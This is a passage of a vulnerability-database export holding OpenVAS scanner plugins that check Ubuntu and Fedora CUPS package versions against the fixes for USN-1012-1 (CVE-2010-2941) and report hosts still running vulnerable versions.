isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:31", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1012-1", "modified": "2017-12-01T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840531", "id": "OPENVAS:840531", "title": "Ubuntu Update for cups, cupsys vulnerability USN-1012-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1012_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for cups, cupsys vulnerability USN-1012-1\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emmanuel Bouillon discovered that CUPS did not properly handle certain\n Internet Printing Protocol (IPP) packets. A remote attacker could use this\n flaw to cause a denial of service or possibly execute arbitrary code. 
In\n the default installation in Ubuntu 8.04 LTS and later, attackers would be\n isolated by the CUPS AppArmor profile.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1012-1\";\ntag_affected = \"cups, cupsys vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1012-1/\");\n script_id(840531);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1012-1\");\n script_cve_id(\"CVE-2010-2941\");\n script_name(\"Ubuntu Update for cups, cupsys vulnerability USN-1012-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.1-5ubuntu2.7\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.20\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupscgi1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsdriver1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsmime1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsppdc1\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-dbg\", 
ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.4.3-1ubuntu1.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcupsys2\", 
ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:58:01", "bulletinFamily": "scanner", "description": "Check for the Version of cups", "modified": "2017-12-15T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862590", "id": "OPENVAS:862590", "title": "Fedora Update for cups FEDORA-2010-17641", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cups FEDORA-2010-17641\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cups on Fedora 14\";\ntag_insight = \"The Common UNIX Printing System provides a portable printing layer for\n UNIX® operating systems. It has been developed by Easy Software Products\n to promote a standard printing solution for all UNIX vendors and users.\n CUPS provides the System V and Berkeley command-line interfaces.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050977.html\");\n script_id(862590);\n script_version(\"$Revision: 8130 $\");\n 